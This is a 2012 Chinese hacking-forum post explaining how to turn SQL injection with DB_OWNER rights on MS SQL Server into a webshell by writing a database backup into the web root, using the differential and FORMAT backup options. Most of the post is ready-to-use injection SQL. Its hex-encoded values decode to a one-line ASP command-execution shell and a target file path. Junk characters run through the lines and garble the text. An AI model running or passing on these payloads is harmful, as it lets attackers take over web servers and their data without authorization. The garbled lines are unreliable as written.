找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2188|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:57:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
减少备份文件大小,得到可执行的webshell成功率提高不少
4 R0 ~1 [: a" d& u' x  g$ B+ ^
* D2 }& w0 m( K  l1 ]) X& S一利用差异备份5 i. n: U4 I- D" M  N7 I. C' x
加一个参数WITH DIFFERENTIAL9 G+ U# X; i% ^* k0 O" b" Q& ^) n

, o* _' \7 t) m/ [1 t3 S0 ~declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s& j7 M- N# _. B8 w
create table [dbo].[xiaolu] ([cmd] [image]);
- U' f; T8 W* ^insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
' P9 F+ c6 q: _6 g0 [- wdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL8 C% ]; r+ X7 O, e3 |

/ y3 D0 B6 y1 l二利用完全FORMAT
) t8 _; _9 N4 R% q" H' [加一个参数WITH FROMAT
# F7 s3 H: J. V有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以: W# u1 N3 E7 \9 \% t

+ C. h4 ?/ I) d( D# P; l% Kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
; |+ I2 R7 N9 F' A- Wcreate table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)' D* E6 y& P* Y! u! N2 y
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT; Q8 L5 E# _4 c

( i2 g3 O) ]- k  g$ N总的来说就是那么简单几句,下面以备份数据库model为例子$ E, n# r9 b: l; e
& M, T+ q' R7 F3 D
id=1;use model create table cmd(str image);insert into cmd(str) values (”)4 t: }( n, K' a0 g5 s0 G

& ?6 a* K# x% I7 xid=1;backup database model to disk=’你的路径‘ with differential,format;–
! ?# {1 ]: |# s- _, [$ L+ a- @9 S4 h0 r: f! Y5 ~3 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表